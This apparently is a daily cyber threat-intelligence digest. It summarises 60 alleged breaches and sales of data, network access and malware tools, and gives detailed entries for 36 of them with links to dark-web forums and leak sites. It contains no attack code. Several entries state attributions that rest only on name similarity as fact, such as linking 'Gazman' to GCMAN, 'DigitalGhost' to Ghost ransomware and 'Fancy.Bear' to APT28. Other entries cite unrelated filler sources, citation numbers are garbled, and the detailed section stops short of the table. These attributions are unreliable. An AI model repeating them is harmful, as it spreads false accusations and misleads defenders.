I. Executive Summary
This report provides a concise analysis of significant cybersecurity incidents observed in the last 24 hours, focusing on key breaches and the evolving threat landscape. It highlights the tactics, techniques, and procedures (TTPs) of identified threat actors, offering critical context beyond raw incident data.
Key Takeaways
A recurring theme in recent cyber activity is the persistent exploitation of known, unpatched vulnerabilities in public-facing applications, particularly Microsoft Exchange servers.[1] Such unpatched flaws enable rapid initial access for ransomware deployment and credential theft, exposing a fundamental weakness in many organizations’ security postures. The swift progression from initial compromise to significant impact, often within the same day, underscores the critical need for immediate patching and proactive vulnerability management.
Threat actors, including state-sponsored groups like Leviathan and the potentially nation-state-aligned CL-STA-0002, are increasingly employing advanced techniques for stealthy command and control (C2) and data exfiltration.[3] These methods involve sophisticated defense evasion tactics such as steganography, protocol impersonation, DNS covert channels, and the leveraging of legitimate services like Tor, Pastebin, GitHub, and Dropbox for C2 communication. This approach allows malicious traffic to blend seamlessly with normal network activity, making detection significantly more challenging for traditional security measures.
The cybercrime ecosystem continues to professionalize and specialize, as evidenced by the emergence of Initial Access Brokers (IABs) like ToyMaker [6] and the evolution of ransomware groups into “cartels” such as DragonForce.[7] This specialization lowers the barrier to entry for less technically proficient groups, increasing the volume and complexity of attacks. The cartel model, with its shared infrastructure and profit-sharing incentives, also enhances the resilience and reach of these criminal enterprises, making them harder to dismantle through conventional law enforcement efforts.
Finally, state-sponsored groups, notably those affiliated with Iran, China, Russia, and North Korea, persistently leverage cyber operations as a geopolitical tool.[8] These actors engage in espionage, disruption, and influence campaigns, often blurring the lines between state-backed activity and hacktivism. This deliberate ambiguity complicates attribution and response, as the intent is frequently to create instability or signal strength without triggering direct military confrontation. The long-term infiltration strategies observed in some of these groups further highlight the need for sustained vigilance and integrated intelligence efforts.
Immediate Implications
Organizations must prioritize rapid patching of all known vulnerabilities, especially on internet-facing systems, to close common entry points. Enhancing behavioral detection capabilities on endpoints and across network segments is crucial to identify anomalous activity that might indicate covert C2 or advanced credential theft. Furthermore, robust supply chain security measures, including rigorous vetting of third-party software and services, are essential. Implementing and enforcing multi-factor authentication (MFA) for all critical systems and accounts remains a fundamental defense against credential harvesting.
II. Daily Incident Overview
This section provides an overview of the cybersecurity incidents reported in the last 24 hours. The table below summarizes each reported breach; Section III provides the detailed analysis of each incident.
Summary Statistics of Reported Breaches
Incident ID | Affected Entity | Incident Type | Identified Threat Actor(s) |
I-01 | Telecom Sector (Multiple Countries) | Data Leak | ScribeOfBabylon |
I-02 | Unidentified | Data Leak | Gazman |
I-03 | USA | Data Leak | @olzo_0 |
I-04 | Unidentified Organization in Brazil | Initial Access | shiitbaby |
I-05 | Informatika A.D | Data Breach | Worldleaks |
I-06 | Sport Vision Bulgaria | Data Breach | LeVendeur |
I-07 | Sumber Rezeki | Data Breach | MrRius |
I-08 | German B2B and B2C Entities | Data Leak | Panda |
I-09 | SMS Provider | Malware | VoicePhishing |
I-10 | Bizouk.com | Data Breach | grep |
I-11 | Brazilian Corporation | Initial Access | DARK_ALPHA |
I-12 | TO Brasil | Data Breach | Worldleaks |
I-13 | Parking Payment Service (USA) | Data Leak | Step |
I-14 | Indian Media Club | Data Breach | Cyber Regulation Organization |
I-15 | India | Data Leak | Cyber Regulation Organization |
I-16 | Canadian Company | Initial Access | Dimitry_S |
I-17 | Indian Aadhaar Database | Data Leak | phonedatabase01 |
I-18 | BINANCE Crypto Platform | Data Leak | cryptodata01 |
I-19 | Carso Metal | Data Breach | Cyber Isnaad Front |
I-20 | BZMT | Data Breach | Cyber Isnaad Front |
I-21 | Industrial Palletizer Control System (Netherlands) | Initial Access | Z-ALLIANCE |
I-22 | Unidentified Motorcycle Rental Shop (UAE) | Data Leak | Xaos |
I-23 | Prestashop E-commerce Website (Spain) | Initial Access | Fancy.Bear |
I-24 | Unidentified | Malware | 003 |
I-25 | Numerous Organizations | Data Leak | Nick Diesel |
I-26 | Pakistan’s NADRA NICOP | Data Breach | ANON-SEC-KERALA |
I-27 | Bank Banten | Data Breach | Jack_back |
I-28 | U.S. and Polish Consumers (Chopov Sources) | Data Breach | Krestrash |
I-29 | UHQ Early Crypto Whales | Data Breach | Asipati |
I-30 | Defense Visual Information Distribution Service (DVIDS) | Data Breach | DigitalGhost |
I-31 | SSI Securities Corporation | Data Breach | giorggios |
I-32 | Taiwan’s Ministry of National Defense | Data Breach | Jetimbek |
I-33 | Israel Defense Forces (IDF) | Data Leak | intel |
I-34 | Unidentified | Malware | JordiChin |
I-35 | US Voters | Data Leak | info_usa |
I-36 | USA B2C Gamblers | Data Leak | info_usa |
I-37 | Kementerian PANRB | Data Breach | Xsvs_Malaikat |
I-38 | Bank Melli and Bank Mellat | Data Breach | APT IRAN |
I-39 | E-Office Dukcapil | Data Breach | JakartaCyberPsychos_s |
I-40 | Spotify | Data Breach | abc |
I-41 | Bybit (Malaysia) | Data Breach | Market Exchange |
I-42 | Mengly J. Quach Education | Data Leak | sideline_TH |
I-43 | Indian Fiber Optic Networks | Data Leak | Market Exchange |
I-44 | Upstox | Data Breach | chuu |
I-45 | Indian Passport Holders | Data Leak | Market Exchange |
I-46 | Unidentified | Malware | xrahitel |
I-47 | Kleinanzeigen | Data Breach | magically |
I-48 | Telegram Chats | Data Leak | Matteo |
I-49 | Bank of Baroda | Data Breach | Market Exchange |
I-50 | Bybit | Data Breach | MindReader9 |
I-51 | Korean E-Commerce Platform | Data Leak | BezzzDelnick |
I-52 | Fling.com | Data Breach | Matteo |
I-53 | Constitutional Court of Indonesia | Data Leak | Xsvs_Malaikat |
I-54 | Dubsmash | Data Breach | Matteo |
I-55 | IAIN Syekh Nurjati Cirebon | Defacement | WOLF CYBER ARMY |
I-56 | JAWA TENGAH | Data Breach | Xsvs_Malaikat |
I-57 | Kraken | Initial Access | DarkFor |
I-58 | Explore Redwoods | Defacement | WOLF CYBER ARMY |
I-59 | Explore Redwoods | Defacement | WOLF CYBER ARMY |
I-60 | Kalad | Data Breach | ZeroDayX |
III. Detailed Incident Analysis
Incident ID: I-01 – Alleged sale of Telecom Data from multiple countries
- Incident Description: The threat actor, ScribeOfBabylon, claims to be selling telecom data from a vast array of countries, including Algeria, Argentina, Australia, Austria, Bahrain, Bangladesh, Belgium, Bolivia, Brazil, Cameroon, Canada, Chile, China, Colombia, Costa Rica, Croatia, Czech Republic, Denmark, Egypt, Finland, France, Germany, Greece, Guatemala, Hong Kong, Hungary, India, Indonesia, Iran, Iraq, Ireland, Israel, Italy, Japan, Jordan, Kazakhstan, Kuwait, Lebanon, Libya, Malaysia, Mexico, Morocco, Netherlands, New Zealand, Nigeria, Norway, Oman, Pakistan, Palestine, Panama, Peru, Philippines, Poland, Portugal, Qatar, Russia, Saudi Arabia, Singapore, South Africa, Spain, Sudan, Sweden, Switzerland, Syria, Taiwan, Thailand, Tunisia, Turkey, United Arab Emirates, United Kingdom, Uruguay, USA, and Vietnam. Specific details about ScribeOfBabylon are not available in the provided intelligence.
- Identified Threat Actor(s): ScribeOfBabylon
- Relevant Links:
- Published URL: https://darkforums.st/Thread-%F0%9F%9A%A8-Exclusive-Telecom-Data-for-Sale-%F0%9F%93%9E
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/dcd0f193-a6da-4984-807e-8b27257fa8c4.png
Incident ID: I-02 – Alleged sale of Email Credentials
- Incident Description: The threat actor, Gazman, is offering to sell a collection of 15,000 valid email addresses and passwords. Gazman is an alias for GCMAN, a threat group primarily focused on targeting banks for financial gain, specifically to transfer money to e-currency services.[13] While GCMAN typically targets financial institutions with “APT-style bank robberies,” this incident suggests a broader scope of data acquisition for potential resale or use in other financially motivated schemes.[13]
- Identified Threat Actor(s): Gazman
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261417/?tab=comments#comment-1577058
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/27637914-faf8-4beb-8633-c1096d1880c3.png
Incident ID: I-03 – Alleged leak of an editable USA passport PSD file
- Incident Description: The threat actor, @olzo_0, claims to have leaked a fully editable USA passport PSD file. Specific details about @olzo_0 are not available in the provided intelligence.
- Identified Threat Actor(s): @olzo_0
- Relevant Links:
- Published URL: https://leakbase.la/threads/usa-passport-psd.39679/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/de1ebdf2-34a0-4238-8c26-d08108f96f6e.png
Incident ID: I-04 – Alleged sale of access to an unidentified organization in Brazil
- Incident Description: The threat actor, shiitbaby, is offering to sell unauthorized VPN access with admin-level privileges to an unidentified organization based in Brazil. Specific details about shiitbaby are not available in the provided intelligence.
- Identified Threat Actor(s): shiitbaby
- Relevant Links:
- Published URL: https://xss.is/threads/140553/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/6156fe9a-028f-418f-b2e0-c25948caa2ae.png
Incident ID: I-05 – Alleged data breach of Informatika A.D
- Incident Description: The threat group, Worldleaks, claims to have obtained 2.6 TB of data from Informatika A.D., including 1,749,058 files. Informatika A.D. is the oldest and leading information technology company in the West Balkans, established in 1976, providing ICT solutions in computer and communication infrastructure, industrial process automation, and integrated business process management.[14] Specific details about Worldleaks are not available in the provided intelligence.
- Identified Threat Actor(s): Worldleaks
- Relevant Links:
- Published URL: https://worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid.onion/companies/5717675623
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/0dea369c-31d8-4ec2-9922-aaf95e652008.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/9f9bc027-57e6-4800-a700-9194d6652d89.png
Incident ID: I-06 – Alleged data sale of Sport Vision Bulgaria
- Incident Description: The threat actor, LeVendeur, claims to have breached Sport Vision Bulgaria’s data, leaking over 1 million records. The exposed data reportedly includes personal information such as full names, addresses, phone numbers, and more. Sport Vision Group is a leader in sports retail in Southeast Europe, operating in 13 countries with over 600 modern stores.[15] Specific details about LeVendeur are not available in the provided intelligence.
- Identified Threat Actor(s): LeVendeur
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-SportVision-1-390-766M-Bulgaria
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/48933174-032c-4151-973c-4f20435fdffe.png
Incident ID: I-07 – Alleged data breach of Sumber Rezeki
- Incident Description: The threat actor, MrRius, claims to have breached Sumber Rezeki’s data. Sumber Rezeki Areca is an Indonesian company with 74 export shipments recorded, primarily exporting areca nuts to Thailand, Nepal, and India.[17] Specific details about MrRius are not available in the provided intelligence.
- Identified Threat Actor(s): MrRius
- Relevant Links:
- Published URL: https://darkforums.st/Thread-WWW-SUMBERREZEKI-CO-ID-HAS-BEEN-LEAKED-BY-MR-RIUS-DATABASE
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/6bb482dc-2fa7-4b8c-9a56-f51fcecd96e9.png
Incident ID: I-08 – Alleged database sale of German B2B and B2C contact information
- Incident Description: The threat actor, Panda, is offering to sell a database containing contact details of both B2B and B2C entities in Germany. The dataset reportedly includes names, email addresses, phone numbers, and other business-related contact data. Specific details about Panda are not available in the provided intelligence.
- Identified Threat Actor(s): Panda
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-GERMANY-2025-%E2%80%93-Exclusive-Contact-Database-B2B-B2C-FULLZ
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/b4bc4c36-2e21-422d-8487-126be4c0598a.png
Incident ID: I-09 – Alleged sale of an exploit for an SMS provider
- Incident Description: A threat actor, VoicePhishing, claims to be selling an SQL injection exploit targeting an SMS provider with over 100,000 users. The exploit allegedly enables access to user accounts, including the retrieval of SMS OTPs and bulk SMS functionality. A custom hash decrypter tool is also provided to assist in credential recovery. Specific details about VoicePhishing are not available in the provided intelligence.
- Identified Threat Actor(s): VoicePhishing
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261414/?tab=comments#comment-1577043
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/bcc5ed85-b80f-4e8d-85fb-17a2099fc15f.png
Incident ID: I-10 – Alleged data sale of Bizouk.com
- Incident Description: The threat actor, grep, is offering to sell organizational data from Bizouk.com, leaking over 5.8 million records primarily consisting of customer information. The leak includes two datasets: one with sensitive personal details such as names, dates of birth, addresses, and phone numbers; the other detailing customer orders, including order IDs, user IDs, order types, fee amounts, and more. Bizouk.com is a platform dedicated to connecting the Afro-Caribbean cultural community through various events and entertainment options, including music, gastronomy, and social gatherings.[19] Specific details about grep are not available in the provided intelligence.
- Identified Threat Actor(s): grep
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-France-5-8M-Bizouk-com-Customers-Database
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/3e73ec49-5b68-4464-ad4a-fb432cb4338b.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/779c84ff-1f28-4d29-baeb-a20509c37dda.png
Incident ID: I-11 – Alleged sale of unauthorized admin access to a Brazilian corporation
- Incident Description: The threat actor, DARK_ALPHA, claims to be selling unauthorized administrator access to a Brazilian corporation specializing in custom system development, e-commerce platform optimization, mobile app development, cloud hosting, and digital payment integration. The access reportedly includes full WordPress administrator privileges. While specific details about DARK_ALPHA are not available, the tactics align with those of DarkGate Loader, which is delivered via phishing emails and deploys post-exploitation payloads, often as AutoIt scripts.[20] DarkGate Loader is known for fast-paced delivery of post-exploitation tools and quick lateral movement.[20]
- Identified Threat Actor(s): DARK_ALPHA
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-Selling-WordPress-Access-super-admin-brazil-corp
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/7f7a2ccf-8d15-4381-92ce-93c983f1eb16.png
Incident ID: I-12 – Alleged data breach of TO Brasil
- Incident Description: The threat group, Worldleaks, claims to have obtained 1.6 TB of data from TO Brasil, including 2,302,869 files. TO Brasil is a Brazilian telecommunications company, a subsidiary of TIM S.p.A., providing mobile and fixed telephony services, data transmission, and high-speed internet access.[21] Specific details about Worldleaks are not available in the provided intelligence.
- Identified Threat Actor(s): Worldleaks
- Relevant Links:
- Published URL: https://worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid.onion/companies/4368228743
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1e5cdc1e-e7e4-4e09-8abf-660613b7f0d4.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/e404acde-1cb3-45bc-bf0c-2f2c46cd19c8.png
Incident ID: I-13 – Alleged leak of U.S. credit card data from parking payment service
- Incident Description: The threat actor, Step, claims to be selling 1,800 U.S.-issued credit card records without billing information. The data is allegedly sourced from a parking payment service. The compromised data includes NUM, EXP, CVV, First Name, Last Name, Phone Number, and Email. Specific details about Step are not available in the provided intelligence.
- Identified Threat Actor(s): Step
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261410/?tab=comments#comment-1577032
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/35cbf827-4501-4936-a234-b2c081aa6028.png
Incident ID: I-14 – Alleged data breach of Indian Media Club
- Incident Description: The group, Cyber Regulation Organization, claims to have obtained the database of Indian Media Club. The Press Club of India, a meeting point for journalists in Lutyens Delhi, was founded in 1957 and incorporated in 1958, with a mission to work for media-related activities.[23] Specific details about Cyber Regulation Organization are not available in the provided intelligence, though CISA provides general cybersecurity best practices.[24]
- Identified Threat Actor(s): Cyber Regulation Organization
- Relevant Links:
- Published URL: https://t.me/CRO_official_BD/41
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/895a00d9-d251-4c5f-983e-a65d2eea683a.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/25d8a893-b1af-4fda-bbdc-b494a0c281a8.png
Incident ID: I-15 – Alleged data leak of India
- Incident Description: The group, Cyber Regulation Organization, claims to have leaked 29k records from India. The compromised data includes personal and account details such as ID, name, address, identification number, date of birth, gender, contact information, passwords, referral codes, membership and location IDs, account status, activation data, OTPs, and user activity timestamps. Specific details about Cyber Regulation Organization are not available in the provided intelligence, though CISA provides general cybersecurity best practices.[24]
- Identified Threat Actor(s): Cyber Regulation Organization
- Relevant Links:
- Published URL: https://t.me/CRO_official_BD/43
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/2f82c76b-7993-414e-a268-0a0c9bce9da5.png
Incident ID: I-16 – Alleged sale of unauthorized admin access to a Canadian company
- Incident Description: The threat actor, Dimitry_S, claims to have unauthorized access to a Canadian company, with access provided via RDP and admin privileges. Specific details about Dimitry_S are not available in the provided intelligence, though a cybersecurity veteran named Dmitry Volkov is mentioned in the research material.[25]
- Identified Threat Actor(s): Dimitry_S
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261406/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/11c363e4-3831-42ac-8ffd-236826bbcab9.png
Incident ID: I-17 – Alleged leak of Indian Aadhaar database
- Incident Description: The threat actor, phonedatabase01, claims to have leaked a database allegedly sourced from an Indian database containing Aadhaar card numbers. Specific details about phonedatabase01 are not available in the provided intelligence.
- Identified Threat Actor(s): phonedatabase01
- Relevant Links:
- Published URL: https://leakbase.la/threads/india-database-with-aadhaar-card-number.39671/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/e00f2b91-83b6-4d25-a8ca-bde2c8eae103.png
Incident ID: I-18 – Alleged leak of BINANCE Crypto Platform User Database
- Incident Description: A threat actor, cryptodata01, claims to be selling a database allegedly sourced from the BINANCE crypto platform. Specific details about cryptodata01 are not available in the provided intelligence.
- Identified Threat Actor(s): cryptodata01
- Relevant Links:
- Published URL: https://leakbase.la/threads/binance-crypto-platform-user-database.39669/da
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/cd0758c0-d6d5-4b8d-a511-d0132707cbce.png
Incident ID: I-19 – Alleged data breach of Carso Metal
- Incident Description: The threat actor, Cyber Isnaad Front, claims to have leaked data from Carso Metal. The compromised data includes military parts ordered by Rafael and Elbit Systems. Carso Metal (A.L. KARSOMETAL EQUIPMENT LTD) is an Israeli company established in 2000, manufacturing equipment parts according to drawings and models, including finishes and assemblies.[26] While specific details about Cyber Isnaad Front are not available, their actions align with Iranian ‘cyber actors’ who have embraced cyber as a tool of asymmetric warfare, focusing on disruption and signaling strength while avoiding direct military confrontation.[8]
- Identified Threat Actor(s): Cyber Isnaad Front
- Relevant Links:
- Published URL: https://t.me/CyberIsnaadFront/206
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/b9f735e5-f81f-4a65-906c-5a6a341d2431.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/a06064c9-c5a5-4139-8e89-135395e297c3.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/107c98f3-458a-4926-9ebf-c67e8f616302.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/85fbaa9f-480b-4520-b5ed-d4880dcca9f9.png
Incident ID: I-20 – Alleged data breach of BZMT
- Incident Description: The threat actor, Cyber Isnaad Front, claims to have leaked data from BZMT. The compromised data includes parts ordered by Rafael and Elbit Systems for the Magach tank, Iron Dome radar systems, explosive devices, antenna wires, and the XACTse vertical color HUD display. B.Z.M.T. Technology & Engineering Ltd. has a production system of 16 processing centers, turning and milling machines capable of processing various materials.[29] While specific details about Cyber Isnaad Front are not available, their actions align with Iranian ‘cyber actors’ who have embraced cyber as a tool of asymmetric warfare, focusing on disruption and signaling strength while avoiding direct military confrontation.[8]
- Identified Threat Actor(s): Cyber Isnaad Front
- Relevant Links:
- Published URL: https://t.me/CyberIsnaadFront/189
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/9b6b7737-364e-47f7-be72-60b5ebb832d8.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/dde0fb04-36fd-4aa7-9bfa-879eaebd44ac.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/39542020-4022-4b9a-8b80-e1412d0d5c62.png
Incident ID: I-21 – Alleged Access to the Industrial Palletizer Control System
- Incident Description: The group, Z-ALLIANCE, claims to have gained access to an industrial palletizer control system in Bergschenhoek, Netherlands, including control over stacking configurations, elevator speed, alarm messages, and operator interface functions. They state they can monitor equipment in real time, manipulate production workflows, and fully disrupt or disable the system if desired. Specific details about Z-ALLIANCE are not available in the provided intelligence.
- Identified Threat Actor(s): Z-ALLIANCE
- Relevant Links:
- Published URL: https://t.me/Z_alliance_ru/268
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1efd5232-3d6c-4c5d-9bf3-d663df5d2d4a.png
Incident ID: I-22 – Alleged data sale of unidentified motorcycle rental shop in UAE
- Incident Description: The threat actor, Xaos, is offering to sell sensitive documents allegedly stolen from an unidentified motorcycle rental shop based in the UAE. The exposed data reportedly includes multiple copies of passports and KYC details of numerous individuals. Specific details about Xaos are not available in the provided intelligence.
- Identified Threat Actor(s): Xaos
- Relevant Links:
- Published URL: https://xss.is/threads/140544/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1104188b-0e18-4149-936f-7c321a22bfcb.png
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/6b8a1c25-b4db-4143-8699-7e0738794c18.png
Incident ID: I-23 – Alleged sale of unauthorized admin access to Prestashop e-commerce website in Spain
- Incident Description: The threat actor, Fancy.Bear, claims to have unauthorized access to a Prestashop (Spain) e-commerce admin panel, specifically involving Credit Card Redirect via Redsys and PayPal payment methods. Fancy Bear, also known as APT28, is a Russian state-sponsored threat actor group motivated by espionage and political influence.[11] They frequently use spearphishing and exploit vulnerabilities like CVE-2024-11182 in webmail interfaces to deliver malicious JavaScript payloads like SpyPress for data exfiltration.[11]
- Identified Threat Actor(s): Fancy.Bear
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261403/?tab=comments#comment-1576998
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/d9a7652d-2cfc-436f-ba4c-172a58a5174f.png
Incident ID: I-24 – Alleged sale of Crypto Drainer
- Incident Description: The threat actor, 003, is offering to sell a Crypto Drainer capable of draining numerous cryptocurrencies including BTC, ETH, LTC, XMR, SOL, USDT, ADA, XRP, and meme coins. 003 is an alias for puNK-003, a North Korean APT group known for deploying Lilith RAT and CURKON malware, primarily through targeted phishing attacks using malicious LNK files.[12]
- Identified Threat Actor(s): 003
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-Best-Crypto-Drainer-2025
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/f25b595e-909b-4fe5-b193-0bddcf1a8d65.png
Incident ID: I-25 – Alleged data leak of numerous organizations
- Incident Description: The threat actor, Nick Diesel, is claiming to have breached over 10 organizations, leaking sensitive personal information such as names, addresses, emails, contact numbers, and much more. Specific details about Nick Diesel are not available in the provided intelligence.
- Identified Threat Actor(s): Nick Diesel
- Relevant Links:
- Published URL: https://xss.is/threads/140543/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/ab63c301-1b28-48f9-aa40-e198817895d4.png
Incident ID: I-26 – Alleged data breach of Pakistan’s NADRA NICOP
- Incident Description: The threat actor, ANON-SEC-KERALA, claims to have leaked a database from Pakistan’s NADRA National Identity Card for Overseas Pakistanis (NICOP). The compromised data contains passport numbers, NICOP IDs, full names, and guardian details. NADRA NICOP is an identity card for Pakistanis living abroad, and its services are provided by the Consulate General of Pakistan Toronto.[30] While specific details about ANON-SEC-KERALA are not available, the research mentions “Kerala Cyber Black Squad” and “Kerala Cyber Extractors” as groups involved in cyber operations targeting India.[9]
- Identified Threat Actor(s): ANON-SEC-KERALA
- Relevant Links:
- Published URL: https://x.com/anon_sec_kerala/status/1937766548112024054
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1da40f28-c71e-4a8e-ba97-71eea4816f10.png
Incident ID: I-27 – Alleged data breach of Bank Banten
- Incident Description: The threat actor, Jack_back, claims to be selling 16 million records from Indonesia’s Bank Banten, including card data, customer info, and ATM logs. Bank Banten (PT Bank Pembangunan Daerah Banten Tbk) is a public commercial bank based in Jakarta, Indonesia, founded in 1992.[32] Specific details about Jack_back are not available in the provided intelligence, though “Backdoor:Java/Jacksbot.B” is a generic threat detected by Microsoft Defender Antivirus.[33]
- Identified Threat Actor(s): Jack_back
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Indonesia-bankbanten-co-id-Bank
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/9d84c9ea-1000-4d9a-ab45-b4fa5fe93b79.jpg
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/099f15d6-2f57-4e35-9774-7ae0f766182a.jpg
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/b61ecea4-74be-48d4-a436-744081cbbd94.jpg
Incident ID: I-28 – Alleged Data Sale of U.S. and Polish Consumers from Chopov Sources
- Incident Description: The threat actor, Krestrash, claims to be selling data from the USA and Poland, allegedly from Chopov sources. The compromised data includes information related to jewelry purchases, car acquisitions, various online stores, and more. The minimum data includes full name (F.I.) and phone number. Specific details about Krestrash are not available in the provided intelligence.
- Identified Threat Actor(s): Krestrash
- Relevant Links:
- Published URL: https://xss.is/threads/140469/
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/83b2cc0a-2ced-4e76-97a0-13caf6288293.png
Incident ID: I-29 – Alleged data sale of UHQ Early crypto whales
- Incident Description: The threat actor, Asipati, claims to be selling a database allegedly containing the data of early cryptocurrency whales. The compromised information reportedly includes contact details, account credentials, and wallet-related metadata linked to high-value early investors. While specific details about Asipati are not available, the research mentions “Iranian ‘cyber actors’” who are linked to the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC) and have been involved in various cybercrimes.[34]
- Identified Threat Actor(s): Asipati
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-UHQ-Early-crypto-whales-data
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/9729f0e5-9d00-4acf-aecd-7704d57bb79a.png
Incident ID: I-30 – Alleged data leak of Defense Visual Information Distribution Service (DVIDS)
- Incident Description: The threat actor, DigitalGhost, claims to have breached the data of the Defense Visual Information Distribution Service (DVIDS). The compromised data includes full name, Social Security number, grade or rank, last known duty station, member or serial number (for Air Force), and date of birth (for Air Force). DVIDS is an operation supported by the Defense Media Activity (DMA), connecting world media with American military personnel and maintaining the DoD archive for worldwide operations.[35] DigitalGhost is an alias for Ghost (Cring) Ransomware, a financially motivated group that exploits publicly facing applications with known CVEs for initial access and deploys Cobalt Strike Beacon malware.[1]
- Identified Threat Actor(s): DigitalGhost
- Relevant Links:
- Published URL: https://darkforums.st/Thread-15-836-727-US-ARMY-DATA
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/616bf47c-b3db-4056-987e-79add029566c.png
Incident ID: I-31 – Alleged data leak of SSI Securities Corporation
- Incident Description: The threat actor, giorggios, claims to have leaked the data of SSI Securities Corporation. The compromised data includes full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, and securities account number. SSI Securities Corporation (SSI – HOSE) was founded in December 1999 and is a leading financial institution in Vietnam, providing a comprehensive range of financial products and services.[36] Specific details about giorggios are not available in the provided intelligence.
- Identified Threat Actor(s): giorggios
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-VIETNAM-online-trading-platform-SSI-Securities-Corporation-9-million-users
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/4b520695-511c-4c81-be36-11dc72eb3594.png
Incident ID: I-32 – Alleged database sale of Taiwan’s Ministry of National Defense
- Incident Description: The threat actor, Jetimbek, claims to be selling a database allegedly belonging to Taiwan’s Ministry of National Defense. The compromised data reportedly includes sensitive military personnel information, such as names, ranks, unit assignments, and contact details. Taiwan’s Ministry of National Defense (MND) is responsible for all defense and military affairs of Taiwan, with an annual budget of US$19.1 billion in 2024.38 Specific details about Jetimbek are not available in the provided intelligence, though ToyMaker is an Initial Access Broker.6
- Identified Threat Actor(s): Jetimbek
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-%E2%9C%85%E2%9C%85-Taiwan-military-databases-%E2%9C%85%E2%9C%85
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/14c04636-e505-42fc-ada8-fa3c3a5ef300.png
Incident ID: I-33 – Alleged data leak of Israel Defense Forces
- Incident Description: A threat actor, intel, claims to have leaked data from the Israel Defense Forces (IDF), including a target list containing personal and operational information of military personnel. The IDF serves as the national military of the State of Israel, established in 1948, with mandatory military service for citizens over 18.40 Specific details about intel are not available in the provided intelligence.
- Identified Threat Actor(s): intel
- Relevant Links:
- Published URL: https://kittyforums.to/thread/184
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/d4b62fd7-69f3-4d76-9f7a-aba0d09c60e5.png
Incident ID: I-34 – Alleged Sale of Cracked HIDDENZ HVNC Tool
- Incident Description: A threat actor, JordiChin, is allegedly selling a cracked version of HIDDENZ’s HVNC tool, featuring capabilities such as hidden desktop, hidden browser, profile browsing, hidden CMD and PowerShell, download and execute, hidden miner, startup persistence, encrypted connection, and mutex handling. Specific details about JordiChin are not available in the provided intelligence, though CL-STA-0002 is an unattributed nation-state actor that uses sophisticated tools like Agent Racoon and Ntospy for credential theft and C2.4
- Identified Threat Actor(s): JordiChin
- Relevant Links:
- Published URL: https://demonforums.net/Thread-HIDDENZ-S-HVNC-TOOLS-CRACKED-2025
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/1d7cf738-9c98-4436-a5aa-daf49c89dc26.png
Incident ID: I-35 – Alleged data leak of US voters
- Incident Description: The threat actor, info_usa, claims to have leaked data on 97 million US voters. Specific details about info_usa are not available in the provided intelligence.
- Identified Threat Actor(s): info_usa
- Relevant Links:
- Published URL: https://darkforums.st/Thread-American-%F0%9F%87%BA%F0%9F%87%B8-voters
- Screenshot: https://d34iuop8pidsy8.cloudfront.net/905be01f-4eb4-4404-a2ba-92e0132fe3d2.png
Incident ID: I-36 – Alleged data sale of B2C gamblers USA
- Incident Description: The threat actor, info_usa, claims to be selling a database containing information on 12.8 million B2C gamblers from the USA. The data is 1.2GB in size. Specific details about info_usa are not available in the provided intelligence.
- Identified Threat Actor(s): info_usa
- Relevant Links:
- Published URL: https://darkforums.st/Thread-12-8-Million-USA-B2C-Gamblers
